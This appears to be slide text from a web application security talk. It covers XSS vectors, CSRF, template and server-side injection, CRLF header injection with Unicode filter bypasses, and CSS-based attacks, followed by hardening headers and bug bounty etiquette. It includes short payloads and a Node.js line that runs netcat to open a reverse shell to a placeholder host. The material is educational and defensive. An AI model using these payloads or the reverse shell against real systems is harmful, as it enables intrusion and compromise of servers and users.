<?xml version="1.0" encoding="UTF-8"?>
<agenda>
        <webapps>What we'll be looking for</webapps>
        <browsers>Web Apps Home</browsers>
        <xss>Cross-site scripting</xss>
        <csrf>Cross-Site Request Forgery</csrf>
        <templates-inj><%{It can be handy}%></templates-inj>
        <server-inj>eval(injection)</server-inj>
        <headers-inj>%0D%0A</headers-inj>
        <css-as-a-friend>background:url()</css-as-a-friend>
        <codereview>Now what?</code-review>
        <hardening>Small steps</hardening>
        <bug-bounties>Search/Pwn/Report<bug-bounties>
</agenda>

In computing, a web application or web app is a client–server software application which the client (or user interface) runs in a web browser.

We know that a modern Web App is a pile of technology.

How many stacks are being used?
The links between them?
Possible weaknesses? 

Can we understand:

Graphics and Statistics from Outdated Browser

eval(`ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt('PixelsCamp')`)
Function('a=alert`PixelsCamp`','')()
-{valueOf(){alert`PixelsCamp`}}
new class extends alert("PixelsCamp"){}
data:q;base64,PHNjcmlwdD5hbGVydCgnUGl4ZWxzQ2FtcCcpPC9zY3JpcHQ+

Probably the most prevalent security flaw in Web Applications.

Takes advantage of browsers' features and work flows.

All data sources can be used as a payload.
(DB data, URLs, Emails, Forms, Local Storage, ...)

Reflected Cross-site Scripting (XSS) occurs when an attacker injects browser executable code within a single HTTP response.

it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page.

The persistent (or stored) XSS vulnerability it occurs when the data provided by the attacker is saved, and then permanently displayed to other users in the course of regular browsing, without proper escaping.

DOM Based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM "environment" in the victim’s browser used by the original client side script, so that the client side code runs in an "unexpected" manner.

Mutation XSS was coined by Gareth Heyes and Mario Heiderich to describe an XSS vector that is mutated from a safe state into an unsafe unfiltered state. The most common form of mXSS is from incorrect reads of innerHTML.

A type of Persistent (stored) XSS. patience and hope are the key factors, since we don't know where or whether our payload is going to be executed and end up.

Validate all inputs.
(If I want a name, maybe numbers and most of the symbols shouldn't be accepted 😉)

Escape all outputs

No straight forward approach but we can...

JavaScript

JS escapes

CSS

HTML

No straight forward approach but we can...

Use CSP Header as hardening strategy. 

<img src="http://site.com/someaction.php?item-id=666&ship_to=BAD_GUY"
height="0" width="0">

CSRF is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.

Attack Prerequisite: Victim needs to be authenticated.

Attack

Creates forged HTTP requests.
Creates malicious web pages which generate forged requests.

Goal

Trick the victim into submitting/do a request with interaction or via seamless mechanism triggered when entering the page.

via GET

via POST

1 - Create one unique token per user

2 - Tokens should change per session or request.

3 - Add a per-request token/nonce in addition to the standard session.

Note: If you don't verify tokens/nonces, why bother?!

Use special Headers (SPA).

Same-site cookies

{{%It can be handy%}}

Web application uses templates to make the web pages look more dynamic. Template Injection occurs when user input is embedded in a template in an unsafe manner.
 

However, on the surface, this vulnerability is easy to be mistaken for XSS attacks.

The issue arises due to the use of string concatenation or substitution.

eval(injection)

require('child_process').exec
('netcat -e /bin/sh IP_TO_CONNECT 9999')

SSI (Server-side Include) Injection is a server-side exploit technique that allows an attacker to send code into a web application, which will later be executed locally by the web server.

Attacker code will land on the server-side and we hope to get an execution sink.

PHP

Node.js

Digging into the JS world!

eval()

The eval() function evaluates or executes an argument.

setTimeout(inj,delay)
To schedule execution of a one-time callback after delay milliseconds.

setInterval(inj,delay)
To schedule the repeated execution of callback every delay milliseconds.

ES6 Power

($=>{return inj})()
new Promise($=>inj)
function a(a=inj){}; a();

%0D%0A

Attack usually occurs when there is an input being reflected in a header field of a HTTP response.

If the output is not properly sanitized, attackers can inject arbitrary headers or contents into the response.

Carriage Return (CR)

 \r or %0d

Line Feed (LF)

 \n or %0a

CRLF -> %0d%0a -> (Hit Enter)

Most of the times CRLF are sanitized and it is safe until it is mutated.

Enconding FTW!

CR Alternatives

č | 嘍

Origin Form:   U+010D U+560D
UTF8 Encoded: %C4%8D %E5%98%8D
Decoded:        01 0D   56 0D
Output:         01 0D   56 0D

LF Alternatives

Ċ | 嘊

Origin Form:   U+010A U+560A
UTF8 Encoded: %C4%8A %E5%98%8A
Decoded:       01 0A    56 0A
Output:         01 0A    56 0A

body {
  margin: 0;
  padding: 0;
  background: #ff0000 url(//what.com) Center;
  overflow: hidden;
  font-family: Helvetica;
}

 Style sheet language used for describing the look and formatting of a document written in a markup language.

Dynamic propertites i.e. Expression, Behaviors, HTML Component and Scriptlet.

Firefox

Opera

Internet Explorer

CSS property -moz-binding that attaches an XBL binding to a DOM element.

-o-link unique CSS property from Presto to generate a link.

Defacement and Phishing

Data Leakage via Attribute-Selector

Sessions Ownage (FF)

Mutation XSS

 Compatibility View (or compat mode) FTW!

Internet Explorer

Docmode allows inheritance through frame hierarchy.

OLD Features are back!

Not all but...

HTML Component (.htc) is supported up to docmode 9

Scriptlet (.sct)

Behaviors

Expression

Only for IE10 or below
Need Docmode IE7

Security code review is the process of   auditing the source code for an application to verify:

      - that the proper security and logical             controls are present;

      - that they work as intended;

      - that they have been invoked in all the           right places.

Always look for User Inputs and where data and information are stored (Storage).

Modern apps interact with several services, so we should look for Communication Links and associated data.

When lost, look for Juicy Functions like:

upload, register, validate, giveSomething() and so on.

Sometimes it's not present in the code

Hardening Features/Configurations

Checklist
Data Validation
Authentication / Authorization
Session Management
Cryptography
Error Handling
Logging

Header set X-Frame-Options SAMEORIGIN
Header set X-XSS-Protection 1;mode=block
Header set X-Content-Type-Options nosniff
Header set Strict-Transport-Security max-age=31536000;
Header set Content-Security-Policy default-src 'self'

HTTP headers are the core part of HTTP requests and responses, and they carry information about the browser, the requested content, the server and more.

 Sets the configuration for the cross-site scripting filters built into most browsers. The best configuration is "X-XSS-Protection: 1; mode=block".

X-XSS-Protection 1; mode=block

Tells the browser whether you want to allow your site to be framed or not. By preventing a browser from framing your site you can defend against attacks like clickjacking.

X-Frame-Options SAMEORIGIN | DENY| ALLOW-FROM %uri%

Stops a browser from trying to MIME-sniff the content type and forces it to stick with the declared content-type. This helps to reduce the danger of drive-by downloads. .

X-Content-Type-Options nosniff

Is an excellent feature to support on your site and strengthens your implementation of TLS by getting the User Agent to enforce the use of HTTPS.

Strict-Transport-Security max-age=31536000; includeSubdomains; preload

Is an effective measure to protect your site from several attacks.

By whitelisting sources of approved content, you can prevent the browser from loading malicious assets.

Content-Security-Policy default-src 'self'; script-src 'self' ...

CSP Builder (Helper): https://report-uri.io/home/generate

Protects your site from MiTM attacks using rogue X.509 certificates.

By whitelisting only the identities that the browser should trust, your users are protected in the event a certificate authority is compromised.

Public-Key-Pins pin-sha256="t/OMbK...JM="; max-age=600; report-uri="..."

The overarching goal is to reduce the burden of migrating websites from a priori insecure origins by reducing the negative side effects of mixed content blocking.

<meta http-equiv=Content-Security-Policy content=upgrade-insecure-requests>

Upgrade-Insecure-Requests 1

Mechanism by which user agents may verify that a fetched resource has been delivered without unexpected manipulation.

<script src="https://example.com/example-framework.js"
        integrity="sha384-Li9vy3DqF8tnTXu...gNR/VqsVpcw+T...Jr7"
        crossorigin="anonymous"></script>

Session, Secure, HTTPOnly and SameSite

https://bugcrowd.com - https://hackerone.com
Search for a Security Page

Reputation - Money - Fun - Test new attacks

Above all improve AppSec Skills

Be polite, don't beg, don't put down the entire network (just because you can) and remember on the other side, there's always a busy team!